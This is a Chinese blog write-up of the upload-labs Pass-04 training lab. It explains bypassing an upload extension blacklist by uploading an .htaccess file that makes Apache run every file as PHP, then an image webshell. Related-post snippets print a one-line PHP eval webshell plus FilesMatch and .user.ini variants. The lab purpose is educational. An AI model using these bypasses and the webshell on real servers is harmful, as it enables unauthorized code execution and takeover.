【upload-labs】————5、Pass-04

最新推荐文章于 2025-04-08 17:06:15 发布
最新推荐文章于 2025-04-08 17:06:15 发布
阅读量472 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 【渗透测试实战2】 # upload-labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Fly_hps/article/details/99637274
本文探讨了一种绕过后端文件上传检测的方法,通过使用.htaccess文件设置解析规则,使图片文件被服务器误认为PHP文件并成功执行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

闯关界面

首先上传一个shell.php文件看看对于上传文件的检测是前端检测还是后端检测:

之后我们来查看一下源代码:

从上面可以看到基本上过滤了所有的常见的后缀名,而且先全部进行小写转换,对文件后缀名进行拆分,之后来进行检测,看起来好像没有戏了,那么这种情况下怎么办呢?不妨试试.htaccess攻击看看:
首先我们上传一个.htaccess文件,文件内容如下:

SetHandler application/x-httpd-php

这样所有文件都会解析为php,然后再上传图片马,就可以解析:

可以看到上传的图片文件被成功的解析为了php文件~

5.upload-labsPass05
qwsn
03-13 3102
一、Pass05 1、上传一个shell.php shell.php内容为:<?php @eval($_POST['123']);?> //结果如下图所示,提示我们此文件不允许上传 2、扩展名黑名单绕过方法: ①、上传,shell.php.jpg //尝试是否存在apache的解析漏洞 //结果,不能解析 ②、上传.htaccess //尝试,是否被过滤 //结果,被过滤 ③、打开...
Upload-labs靶场Pass01-Pass21全解
beiweixiaotian66的博客
07-31 1466
UPload-labs小练习
Upload LABS Pass-4
热门推荐
wangyuxiang946的博客
07-02 1万+
uploadlabs4upload labs 第四关在后端使用了黑名单,并过滤了空格,点,以及大小写 , 但未过滤 .htaccess(分布式配置) , 固此关卡使用 分布式配置文件绕过黑名单
upload-labspass-04 .htaccess绕过
qq_43665434的博客
03-18 2130
upload-labspass-04 .htaccess绕过 1、测试流程 玩法一 先尝试上传一个php文件: 如图所示,提示此文件不允许上传。 抓包改后缀试试: Apache解析漏洞:Apache会将不认识的后缀,如suibianxie.php.xxx.ccc、test.php.iii等从右向左解析,不认识就往左移一个,最终移到php时apache认识了就会将该文件当作php文件来解析。 如图所示上传成功,而且文件名没有改。 用浏览器去访问该文件: 发现被成功解析了。 这有点太轻松了,想换一
Upload LABS Pass-5
wangyuxiang946的博客
07-02 1万+
uploadlabs5upload labs 第五关在后端使用了黑名单 , 并过滤了空格,点 , 但未过滤大小写 , 我们修改文件后缀大小写来绕过黑名单
Upload-labs Pass-04 .htaccess文件上传
baynk的博客
11-03 2171
Pass-04 .htaccess文件上传 0x01 过程 传php时,只有此文件不允许上传字样,burpsuite改个名查看一下。 和上关有点像,但是好像没有被重命名,可以试试apache的解析漏洞,test.php.xxxx.yyy这种不认识的后缀名会从右往左依次解析,不认识就往左移一个,像这个就会当作test.php处理,来,尝试一下。 访问一下,可以成功解析。 这就没了?不,我觉得...
文件上传漏洞upload-labs1-19关详解
qq_51780583的博客
03-07 2445
upload-labs1-19关详解
upload-labs靶场详解
lizhiiiii的博客
04-17 1463
使用小皮集成环境来完成这个靶场 将文件放到WWW目录下就可以进行访问。
生命在于折腾——upload-labs
易水哲的博客
08-25 1204
Upload-labs练习
upload-labs:pass-04
羽的博客
07-07 615
后端过滤了很多东西,大小写也过滤了。 想到有个.htaccess后缀还可以用。 (文件名): .htaccess: (内容) : SetHandler application/x-httpd-php 他的作用就是可以把后端的任意后缀名的文件当做PHP文件来执行(虽然理解有点粗暴,不过道理就是这样啊) 所以我们就直接传马 这个在操作时,会在后端对配置文件有要求,不是特定的环境不能用,算其中的一种绕过姿势了 ...
【网络安全】upload-labs Pass-04 解题详析
等风来
08-14 5791
htaccess(Hypertext Access)是一个用于配置Apache服务器行为的配置文件。它通常位于网站的根目录或特定目录中,并用来控制目录下的文件访问权限、重定向、错误处理、认证等方面的设置。当服务器收到对"asdfg.jpg"文件的请求时,根据该指令,服务器会将其当作PHP脚本来处理,而不是直接将其作为静态图片返回给用户。这段代码是使用.htaccess文件的FilesMatch指令来对特定的文件进行处理。因此我们可以上传.htaccess文件,实现能够访问脚本文件、执行脚本即可。
upload-labs靶场 Pass-04通关教程
m0_73812072的博客
04-08 623
最近在打upload-labs的靶场时,发现第四关有点意思,所以就顺便记录下来。首先我们在本地搭建upload-lab靶场时,发现用bp抓不了包怎么办,可以看看这个链接。我们查看关卡源码:发现能把我们想到绕过的后缀都写到了,但是却注意到.htaccess配置文件没有进行相关的过滤。这就说明我们可以自己构造一个.htaccess配置文件制定规则,然后再上传自己的一句话漏洞。我们首先用记事本打开txt文件,然后输入下列代码,并右键-属性-后缀改为.htaccess。
upload-labs-5
Lu__xiao的博客
02-25 555
登陆第五关 查看提示、源代码 从代码中可以看出删除文件名末尾的点,去除字符串,首尾去空并且它没有使用循环验证 上传 抓包 发送到repeater 在文件名后添加. . 当它验证首先去掉一个点再去掉空格,因为没有循环只验证一次所以我们还有一个点,这时我们就上传成功了 ...
文件上传漏洞靶场upload-labs学习(pass1-pass5
AFCC_的博客(Web_Dog)
02-18 5867
0x00 upload-labs简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。在2019年11月添加新的pass-05后关卡总数为21关。
upload-labs通关(Pass01-Pass05)
m0_46467017的博客
08-15 2244
我们在数据包中把后缀名改为.php. .,首先他发现有一个点,这时会把他去掉,又发现有一个空格,也会把它去掉,我们这时还有一个点,也就是.php. 由于他只是验证一次,所以不会在去掉我们的点。我们在数据包中把后缀名改为.php. .,首先他发现有一个点,这时会把他去掉,又发现有一个空格,也会把它去掉,我们这时还有一个点,也就是.php. 由于他只是验证一次,所以不会在去掉我们的点。本关也有两种绕过方法:第一种是上传php文件,改Content-Type,第二种是上次合法后缀文件,改文件改后缀。...
upload -labs-05
m0_51998814的博客
04-06 2208
一、前言 第五关主要是对源代码的一个分析,然后进行绕过上传文件。 二、环境 靶场:upload-labs 工具:burpsuit 三、思路 首先我们查看提示,显示“上传目录存在PHP文件”,说明本关可以直接上传php文件,但估计没这么简单,还是分析一下源码。 查看源码: $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $
3/4.upload-labsPass03和Pass04
qwsn
03-13 1358
一、Pass-03/Pass-04 1、上传一个shell.php shell.php内容为:<?php @eval($_POST['123']);?> 结果,提示不允许上传.asp .aspx .php .jsp后缀的文件 2、黑名单未限制.htaccess的情况: ①、上传.htaccess文件 文件内容为:<FilesMatch "qwsn"> SetHan...
upload-labs靶场-Pass-04-思路以及过程
weixin_44257023的博客
01-14 1601
开始前的小准备 upload-labs靶场 是PHP环境运行的,所以我准备了一个PHP脚本和一张图片 图片好准备,PHP脚本如果不想写的话可以用我的这个获取当前时间的PHP脚本 <?php header("content-type:text/html;charset=utf-8"); date_default_timezone_set("PRC");//设置时区 echo "当前时间为:"; $today = date("Y-m-d D h:i:s A "); echo $today; ?
upload-labs/Pass-04 wp
最新发布
07-08
upload-labs靶场挑战的Pass-04关卡中,目标是通过上传一个合法的WebShell文件以获得服务器控制权限。此关卡主要测试对文件上传漏洞的理解以及绕过常见安全检查的能力。 ### 解题思路 Pass-04关卡通常会对上传文件的扩展名进行严格限制,例如只允许特定类型的图片文件(如`.jpg`、`.png`)。然而,这种检查往往仅限于前端或简单的后端逻辑,可以通过修改文件扩展名或利用服务器解析漏洞来绕过。 #### 详细步骤: 1. **创建WebShell文件**:首先需要准备一个包含PHP代码的文件,该文件可以执行任意命令。例如,使用以下内容创建一个名为`getinfo.png`的文件: ```php <?php phpinfo(); ?> ``` 这里将文件命名为`.png`是为了绕过前端对文件扩展名的检查[^1]。 2. **上传WebShell文件**:将上述创建的`getinfo.png`文件上传到服务器。由于Pass-04可能对文件扩展名进行了过滤,因此需要尝试不同的方法来绕过这些限制,例如使用大小写混合、添加特殊字符等技巧。 3. **利用`.user.ini`文件进行包含**:为了确保服务器能够解析并执行上传的PHP文件,可以在同一目录下上传一个`.user.ini`文件,内容如下: ``` auto_prepend_file=getinfo.png ``` 此配置会强制服务器在每个PHP请求之前包含指定的文件,从而触发WebShell的执行。 4. **访问WebShell**:上传完成后,尝试访问服务器上的任意PHP页面,并在其URL后面手动替换为`getinfo.png`或直接访问`readme.php`(如果存在),以确认WebShell是否成功执行。 5. **获取Webshell**:若一切顺利,此时应能看到`phpinfo()`输出的信息页面,表明已成功上传并执行了PHP代码。接下来可以将`getinfo.png`替换为更复杂的WebShell工具,如`cmd.php`,以便进一步控制服务器。 ### 注意事项 - 部分服务器可能启用了`open_basedir`限制,导致无法通过`.user.ini`进行文件包含。此时需寻找其他方式绕过限制。 - 如果发现上传的文件被重命名或无法正常访问,可能是服务器端采用了更严格的验证机制,建议尝试不同的文件名或扩展名组合。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值